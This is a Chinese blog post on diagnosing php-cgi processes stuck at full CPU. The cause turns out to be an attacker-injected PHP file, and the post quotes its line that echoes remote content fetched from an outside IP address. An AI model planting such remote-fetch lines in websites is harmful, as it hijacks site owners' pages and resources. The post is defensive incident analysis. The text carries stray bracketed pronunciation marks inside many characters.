linux php-cgi.exe占用cpu 100%的一次排障之旅
先說(shuō)下我們網(wǎng)站的架構(gòu),由于目前網(wǎng)站訪問(wèn)量不是很大,但是由于最近公司網(wǎng)站要推廣,所以將網(wǎng)站由單機(jī)切換成前端用nginx做負(fù)載均衡,帶動(dòng)兩臺(tái)web服務(wù)器,所有網(wǎng)頁(yè)和靜態(tài)文件都通過(guò)NFS共享調(diào)用,NFS服務(wù)裝在其中的一個(gè)web服務(wù)器上,后端用mysql主從的方式,是很典型的架構(gòu)。
切換成這個(gè)架構(gòu)才2天,就收到nagios的報(bào)警,報(bào)警信息顯示有一臺(tái)web服務(wù)器負(fù)載很高,于是通過(guò)SecureCRT登錄到服務(wù)器上,用top命令看了一下,發(fā)現(xiàn)有幾個(gè)php-cgi進(jìn)程占用了大量的CPU,如下:
13889 www 25 0 228m 14m 9344 S 100.4 0.1 14:51.22 php-cgi 13882 www 25 0 227m 13m 9284 S 100.1 0.1 10:53.18 php-cgi 13924 www 25 0 227m 9936 5732 S 100.1 0.1 23:20.80 php-cgi 13927 www 25 0 226m 5228 2064 R 100.1 0.0 24:44.24 php-cgi 13827 www 25 0 228m 15m 10m R 99.7 0.1 12:57.60 php-cgi 13900 www 25 0 228m 19m 13m R 99.7 0.1 9:03.09 php-cgi
由上面的截圖我們可以看出那幾個(gè)php-cgi進(jìn)程不但占用了大量的CPU,而且運(yùn)行時(shí)間非常長(zhǎng),本來(lái)php-cgi接到一個(gè)請(qǐng)求運(yùn)行很快的,怎么這幾個(gè)運(yùn)行那么久還沒(méi)釋放?于是采用命令ls -l /proc/13827/fd/查看這個(gè)長(zhǎng)時(shí)間的進(jìn)程到底在干什么事情,結(jié)果如下:
lrwx------ 1 www www 64 Dec 11 12:03 0 -> socket:[68444030] l-wx------ 1 www www 64 Dec 11 12:03 1 -> pipe:[68444057] l-wx------ 1 www www 64 Dec 11 12:03 2 -> pipe:[68444058] lrwx------ 1 www www 64 Dec 11 12:03 3 -> socket:[68468225] lrwx------ 1 www www 64 Dec 11 12:03 4 -> socket:[68469788] lrwx------ 1 www www 64 Dec 11 12:03 5 -> socket:[68457928]
看到里面沒(méi)有打開(kāi)文件或者寫(xiě)入文件,這個(gè)進(jìn)程沒(méi)干什么事情,比較奇怪,然后采用strace命令跟蹤下看看這個(gè)進(jìn)程在做什么東西呢?
strace -p 13827 poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout) select(5, [4], [4], [], {15, 0}) = 1 (out [4], left {15, 0}) poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout) select(5, [4], [4], [], {15, 0}) = 1 (out [4], left {15, 0}) poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout) select(5, [4], [4], [], {15, 0}) = 1 (out [4], left {15, 0}) poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout) select(5, [4], [4], [], {15, 0}) = 1 (out [4], left {15, 0}) poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout) select(5, [4], [4], [], {15, 0}) = 1 (out [4], left {15, 0}) poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout) select(5, [4], [4], [], {15, 0}) = 1 (out [4], left {15, 0}) poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout) …….
可以看出,這個(gè)進(jìn)程不斷的超時(shí),到底為何會(huì)超時(shí)呢???看來(lái)需要從php-cgi的日志中查找問(wèn)題了,由于原來(lái)php-fpm.conf配置的超時(shí)時(shí)間為0,也就是不設(shè)置超時(shí)時(shí)間。于是先將php-fpm.conf的超時(shí)時(shí)間設(shè)置成5s,然后超過(guò)5s的php-cgi的請(qǐng)求就會(huì)記錄到php的慢日志中,設(shè)置如下:
3s
logs/slow.log
設(shè)置完成,利用命令/usr/local/php/sbin/php-fpm restart重啟php-fpm,過(guò)一會(huì)查看slow.log的內(nèi)容發(fā)現(xiàn)很多如下內(nèi)容:
script_filename = /data/htdocs/bbs.hrloo.com/apl.php
[0x00007fffb060fd70] file_get_contents() /data/htdocs/bbs.hrloo.com/apl.php:10
查看/data/htdocs/bbs.hrloo.com/apl.php第十行的內(nèi)容如下:
echo file_get_contents('http://121.10.108.227:86/yh.asp');
網(wǎng)上查了一下發(fā)現(xiàn)了介紹php這個(gè)函數(shù)當(dāng)里面網(wǎng)址響應(yīng)很慢的時(shí)候就會(huì)出現(xiàn)CPU占用很高的情況,而且會(huì)一直卡住,不會(huì)超時(shí),再看看這個(gè)鏈接,訪問(wèn)一下指向到了一個(gè)小說(shuō)網(wǎng)站,是別人攻擊后嵌入的,將這個(gè)文件還原后恢復(fù)正常。奇怪的是那個(gè)安裝NFS的web服務(wù)器卻不會(huì)出現(xiàn)那個(gè)問(wèn)題,看來(lái)是由于本來(lái)那個(gè)站點(diǎn)又慢,通過(guò)NFS調(diào)用就更慢了,因此出現(xiàn)了這個(gè)故障。感謝這次故障,才發(fā)現(xiàn)了這個(gè)嚴(yán)重的問(wèn)題。
故障修復(fù)了,但是問(wèn)題還遠(yuǎn)遠(yuǎn)沒(méi)有解決,重點(diǎn)要找到文件是如何被修改的,防止再出現(xiàn)類(lèi)似的事故??磥?lái)下面還有很多事情要忙乎了。呵呵!
相關(guān)文章
Apache訪問(wèn)出現(xiàn)501 Method Not Implemented錯(cuò)誤解決
這篇文章主要介紹了Apache訪問(wèn)出現(xiàn)501 Method Not Implemented錯(cuò)誤解決,有些導(dǎo)致該錯(cuò)誤的情況可以用文中修改配置文件的方法來(lái)解決,需要的朋友可以參考下2015-07-07linux服務(wù)器系統(tǒng)CentOS、uBuntu、Gentoo、FreeBSD、Debian的比較
最近一直都是在玩ubuntu的,但是做web服務(wù)器的CentOS還是經(jīng)常被用到,自己也糊涂了2012-12-12linux根據(jù)進(jìn)程號(hào)PID查找啟動(dòng)程序的全路徑
工作環(huán)境中遇到網(wǎng)絡(luò)不正常,檢測(cè)是某服務(wù)器異常往外發(fā)送數(shù)據(jù)包,使用netstat命令查看,發(fā)現(xiàn)有程序。這篇文章主要介紹了linux根據(jù)進(jìn)程號(hào)PID查找啟動(dòng)程序的全路徑,需要的朋友可以參考下2019-08-08Linux crontab定時(shí)任務(wù)配置方法(詳解)
下面小編就為大家?guī)?lái)一篇Linux crontab定時(shí)任務(wù)配置方法(詳解)。小編覺(jué)得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧2016-11-11Apache ActiveMQ任意文件寫(xiě)入漏洞(CVE-2016-3088)復(fù)現(xiàn)
這篇文章主要介紹了Apache ActiveMQ任意文件寫(xiě)入漏洞(CVE-2016-3088)復(fù)現(xiàn),需要的朋友可以參考下2019-08-08淺析在 RHEL8 配置靜態(tài) IP 地址的不同方法
如果一個(gè)人在 Linux 服務(wù)器上正確配置了靜態(tài)地址,那么他/她就可以通過(guò)網(wǎng)絡(luò)遠(yuǎn)程訪問(wèn)它。在本文中,我們將演示在 RHEL 8 服務(wù)器網(wǎng)卡上配置靜態(tài) IP 地址的不同方法,需要的朋友可以參考下2019-09-09Ubuntu18.04服務(wù)器密碼忘記或被篡改如何重置密碼
這篇文章主要介紹了Ubuntu18.04服務(wù)器密碼忘記或被篡改如何重置密碼,本文分步驟給大家介紹的非常詳細(xì),具有一定的參考借鑒價(jià)值,需要的朋友可以參考下2019-09-09